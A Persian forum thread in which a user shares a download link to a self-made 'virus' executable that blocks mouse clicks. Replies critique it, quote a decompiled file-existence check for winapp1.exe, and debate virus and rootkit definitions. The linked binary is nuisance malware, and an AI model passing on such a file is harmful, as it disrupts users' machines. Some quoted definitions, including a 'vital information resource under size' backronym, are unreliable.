این ویروسی که نوشتم نمی زاره موس روی هیچ چیزی کلیک کنه
http://up.iranblog.com/images/lluxvt7qytq48uapi0.rar

راستی برای غیر فعال شدنش باید کلید alt+page up رو بزنین

این ویروسی که نوشتم نمی زاره موس روی هیچ چیزی کلیک کنه
http://up.iranblog.com/images/lluxvt7qytq48uapi0.rar

راستی برای غیر فعال شدنش باید کلید alt+page up رو بزنین


کسی نظری نداره؟؟؟؟؟؟؟

این ویروسی که نوشتم نمی زاره موس روی هیچ چیزی کلیک کنه
http://up.iranblog.com/images/lluxvt7qytq48uapi0.rar

راستی برای غیر فعال شدنش باید کلید alt+page up رو بزنین


کسی نظری نداره؟؟؟؟؟؟؟

بهار جان چی باید بگن ؟
دقیقن قصدت چی بوده این که نشون بدی که می‌شه کلید‌ها رو هندل کرد یا آموزشی چیزی در کار بوده متوجه نمی‌شم ولی در کل همه تا میان برنامه نویسی یاد بگیرن ازشون بپرسی قصد داری چه کاری بکنی؟ می‌گن قصدمون نوشتن یه ویروس‌هست ولی وقتی یاد می‌گیرن برنامه نویسی کنن می‌گی میای یه ویروس بنویسیم فقط می‌خندن « اکثرن »
شما به این خاطر که اون قصد اولیه رو تبدیل کردی به عمل و نشون دادی که پشت‌کار داری سزاوار تشویق هستی :تشویق:

عید شما و تمام دوستان مبارک باشه ./

من دانلود کردم.
اما فقط فایل اجرایی رو آپلود کرده بودید.
تو این سایت بهتره که وقتی می گید من این برنامه رو نوشتم،سورس برنامه رو هم قرار بدید.
این طوری هم آموزش خواهد بود هم بقیه می تونن در مورد برنامه ی شما نظر بدن.

از روی یک فایل EXE نمی شه نظری داد.

هر چند اجرا نشد خطای winapp1.exe داد ؟؟
اما شما فکر کنم مفهموم و معنی ویروس رو اشتباه متوجه شدید ! استفاده از mciSendStringA و چند دستگاری تو رجستری یعنی استفاده از امکانات ویندوز نه یه ویروس
در ضمن تو کد های شما پر از بی دقتی و اشتباه بود مثلا"

if (File (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.IO.File).Exists (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.IO.File/Exists%28String%29:Boolean)(Environment (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Environment).GetFolderPath (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Environment/GetFolderPath%28System.Environment.SpecialFolder%2 9:String)(Environment (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:4.0.0.0:b77a5c561934e089/System.Environment).SpecialFolder (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:4.0.0.0:b77a5c561934e089/System.Environment.SpecialFolder).System (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:4.0.0.0:b77a5c561934e089/System.Environment.SpecialFolder/System)) + @"\winapp1.exe").ToString (http://www.aisto.com/roeder/dotnet/Default.aspx?Target=code://mscorlib:2.0.0.0:b77a5c561934e089/System.Boolean/ToString%28%29:String)() == "False") }


اینم نظر من بود

اما شما فکر کنم مفهموم و معنی ویروس رو اشتباه متوجه شدید ! استفاده از mciSendStringA و چند دستگاری تو رجستری یعنی استفاده از امکانات ویندوز نه یه ویروس

خوب این هم نوعی ویروس هستش. ویروس ها حتما نباید RootKit باشن که بهشون گفته بشه ویروس

ویروس ها حتما نباید RootKit باشن که بهشون گفته بشه ویروس ویروس به RootKit ربطی نداره و دو چیز جدا از هم هستن ؟
http://en.wikipedia.org/wiki/Rootkit
http://en.wikipedia.org/wiki/Computer_virus

فکر کنم این دو لینک ابهام رو رفع کنه

اگه نیاز بود بگید بیشتر توضیح بدم

ویروس به RootKit ربطی نداره و دو چیز جدا از هم هستن ؟
http://en.wikipedia.org/wiki/Rootkit
http://en.wikipedia.org/wiki/Computer_virus

فکر کنم این دو لینک ابهام رو رفع کنه

اگه نیاز بود بگید بیشتر توضیح بدم

ممنون عزیز. من هم مثل شما منبع اصلیم wikipedia است اما نه در همه موارد. توضیحات من (گرچه وقت زیادی برای توضیح ندارم. این نظرات گاها نظرات شخصی بنده هستش):

Virus و RootKit در دسته بندی مجزا در MalWare معرفی میشن و خیلی جاها از این دو به طور مجزا سخن گفته میشه:


Rootkit is a type of malware. Malware, although technically different than a virus




اما به تعریف ویروس توجه کنید:


The term virus(vital information resource under size) is used for a program written by a computer programmer which has infected some executable software and which causes that software

و همچنین :


Virus writers need bandwidth, CPU control, data and remote access

و همچنین به تعریف RootKit:


Root kit is also a virus like Trojan for remote access of any system. Root kit is very powerful as compared to Trojan because root kit implements on kernel level of any operating system, which is hard to detect and delete.

نیاز به توضیح نمیدونم. اما این ارتباط Virus و RootKit رو مشخص میکنه. شاید همیشه wikipedia اطلاعاتی که میخواین رو در اختیارتون نذاره

اما:
جواب اصلی من به شما برای این بود که شما گفته بودید این بنده خدا از رجیستری استفاده کرده و این میشه استفاده از امکانات ویندوز نه یک ویروس. اما اگه یه نگاهی به Computer Viruses بندازید میبینید که Macro-Virus هایی وجود داره که برای عملیات به سادگی از یک تغییر در رجیستری استفاده میکنن. این رو با Bug اشتباه نگیرید.(این از یک نگاه)
از نگاه دیگه:
درسته که برای ویروس مسئله زیر مطرحه:


Basic virus purpose is to only destroy the data

به نظر من این only در حال حاضر باید برداشته بشه. اما این مسئه رو هم درنظر بگیرید:


Viruses may also contain a payload which performs other actions, often malicious

پس این منحصر بودن هدف ویروس از تخریب اطلاعات رو برمیداره و برنامه این دوستمون رو در رده یک ویروس قرار میده...

ببخشید که وقت زیادی نداشتم. ولی توضیحات شما رو هم میشنوم

بله اگه از دید تعریف دقیق به جمله و این فایل یه نگاه بندازیم برنامه بالا هم یه شبه ویروس می شه
ولی از دید من که ویروس هایی دیدم حتی vmLAB رو هم bypass می کنه و به ماشین میزبان می رسه چند لایه پک شده و....

و یا در مقابل روتکیت TDL3 64 بیتی(یعنی Kernel Patch Guard و Driver Sign Check کشک)

و یا حتی یه SSDT hooking , DKOM ساده تو کرنل و...
با تمام احترام هیچی نیست